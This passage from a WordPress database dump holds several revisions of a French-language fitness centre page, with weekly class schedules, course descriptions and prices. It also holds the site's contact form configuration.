class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"><strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n<br>\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:04:14', '2013-07-03 18:04:14', '', 11, 'http://www.crosstrainingcenter.be/?p=208', 0, 'revision', '', 0),
(209, 1, '2013-07-03 18:12:19', '2013-07-03 18:12:19', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:12:19', '2013-07-03 18:12:19', '', 11, 'http://www.crosstrainingcenter.be/?p=209', 0, 'revision', '', 0),
(210, 1, '2013-07-03 18:13:02', '2013-07-03 18:13:02', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:13:02', '2013-07-03 18:13:02', '', 11, 'http://www.crosstrainingcenter.be/?p=210', 0, 'revision', '', 0),
(257, 1, '2013-07-03 20:20:19', '2013-07-03 20:20:19', '<p>Votre nom (obligatoire)<br />\r\n    [text* your-name] </p>\r\n\r\n<p>Votre email (obligatoire)<br />\r\n    [email* your-email] </p>\r\n\r\n<p>Sujet<br />\r\n    [text your-subject] </p>\r\n\r\n<p>Votre message<br />\r\n    [textarea your-message] </p>\r\n\r\n[captchac captcha-712]\r\n<p>Veuillez recopier les caractères ci-dessus<br />\r\n[captchar captcha-712]</p>\r\n\r\n<p>[submit \"Send\"]</p>\n[your-subject]\n[your-name] <[your-email]>\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\njuliepierrard@hotmail.com\n\n\n\n1\n[your-subject]\n[your-name] <[your-email]>\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\nstv@otvr.net\n\n\n\nYour message was sent successfully. Thanks.\nFailed to send your message. Please try later or contact the administrator by another method.\nValidation errors occurred. Please confirm the fields and submit it again.\nFailed to send your message. Please try later or contact the administrator by another method.\nPlease accept the terms to proceed.\nPlease fill the required field.\nYour entered code is incorrect.\nNumber format seems invalid.\nThis number is too small.\nThis number is too large.\nEmail address seems invalid.\nURL seems invalid.\nTelephone number seems invalid.\nFailed to upload file.\nThis file type is not allowed.\nThis file is too large.\nFailed to upload file. Error occurred.\nYour answer is not correct.\nDate format seems invalid.\nThis date is too early.\nThis date is too late.', 'Contact form 1', '', 'publish', 'open', 'open', '', 'contact-form-1', '', '', '2013-07-04 19:41:48', '2013-07-04 19:41:48', '', 0, 'http://www.crosstrainingcenter.be/?post_type=wpcf7_contact_form&#038;p=257', 0, 'wpcf7_contact_form', '', 0),
(211, 1, '2013-07-03 18:21:18', '2013-07-03 18:21:18', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<br><br><br>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<br><br><br>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<br><br><br>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:21:18', '2013-07-03 18:21:18', '', 11, 'http://www.crosstrainingcenter.be/?p=211', 0, 'revision', '', 0),
(213, 1, '2013-07-03 18:23:10', '2013-07-03 18:23:10', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\nUniquement sur rdv\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\nUniquement sur rdv\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\nUniquement sur rdv\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 18:23:10', '2013-07-03 18:23:10', '', 11, 'http://www.crosstrainingcenter.be/?p=213', 0, 'revision', '', 0),
